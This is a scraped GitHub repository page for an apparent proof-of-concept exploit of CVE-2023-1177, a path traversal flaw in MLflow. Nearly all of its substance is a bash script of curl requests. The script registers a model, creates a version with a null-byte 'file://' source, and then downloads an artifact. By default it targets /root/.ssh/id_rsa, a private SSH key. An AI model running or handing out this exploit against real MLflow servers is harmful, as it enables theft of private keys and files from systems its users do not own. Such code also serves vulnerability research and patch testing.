Skip to content

charlesgargasson/CVE-2023-1177

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
LICENSE
LICENSE
 
 
README.rst
README.rst
 
 

Repository files navigation

CVE-2023-1177


MLFlow Path Traversal
Tested on MLflow 2.2.0

#!/bin/bash
RAND="EXPLOIT-$((1+$RANDOM%9999))"
URL="http://172.17.0.2:6001"
FILE='/root/.ssh/id_rsa'
curl -vX POST "$URL/ajax-api/2.0/mlflow/registered-models/create" -d "{\"name\":\"$RAND\"}" -H "Content-Type: application/json"
curl -vX POST "$URL/ajax-api/2.0/mlflow/model-versions/create" -d "{\"name\":\"$RAND\",\"source\":\"file://%00${FILE%/*}/\"}" -H "Content-Type: application/json"
curl -v "$URL/model-versions/get-artifact?path=${FILE##*/}&name=$RAND&version=1"

About

MLFlow Path Traversal

Topics

exploit poc cve mlflow cve-2023-1177

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published